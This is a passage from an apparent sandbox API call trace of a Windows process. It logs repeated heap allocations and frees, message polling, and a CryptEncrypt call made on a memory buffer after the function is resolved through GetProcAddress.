lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0255.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0255.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0255.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0255.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0255.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0255.033] CharLowerBuffW (in: lpsz="byte[15064]", cchLength=0xb | out: lpsz="byte[15064]") returned 0xb [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0255.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f17af0 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0255.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0255.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0255.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x2f1b5d0 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad6) returned 0x2f1f0b0 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1b5d0 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1f0b0 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0255.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0255.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0255.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.040] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54530 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0255.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0255.041] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f17af0*, pdwDataLen=0x8cef60*=0x3ad6, dwBufLen=0x3ad8 | out: pbData=0x2f17af0*, pdwDataLen=0x8cef60*=0x3ad8) returned 1 [0255.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0255.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0255.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0255.042] RtlAllocateHeap 